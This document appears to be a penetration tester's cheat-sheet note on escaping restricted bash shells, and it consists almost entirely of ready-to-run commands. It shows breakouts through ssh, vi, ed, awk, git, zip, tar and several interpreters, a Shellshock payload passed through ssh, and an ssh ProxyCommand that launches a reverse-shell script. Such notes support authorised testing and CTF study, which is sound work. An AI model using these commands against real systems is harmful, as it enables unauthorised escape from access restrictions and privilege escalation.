Rbash Escape

tags: #commands
home: Linux Privilege Escalation#Shell Escapes

SSH

ssh username@ip -t "/bin/sh" 
ssh username@ip -t "/bin/bash"
ssh username@ip -t "() {:;}; /bin/bash"   # Shellshock: only works if the remote bash is unpatched
ssh -o ProxyCommand="sh -c /tmp/revshell.sh" 127.0.0.1 (SUID)

vi

vi
:set shell=/bin/bash
:shell

ed

cd /home
echo $SHELL
ed
!'/bin/bash'
pwd

awk

awk 'BEGIN {system("/bin/bash")}'

git

git help status
!/bin/bash

zip

zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

tar

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash


Programming Languages

python

python -c 'import os; os.system("/bin/bash")'
python3 -c 'import os; os.system("/bin/bash")'

perl

perl -e 'system("/bin/bash");'

php

php -a 
exec("sh -i")

expect

expect spawn sh
sh

lua

lua> os.execute("/bin/sh")

Reference: 44592-linux-restricted-shell-bypass-guide.pdf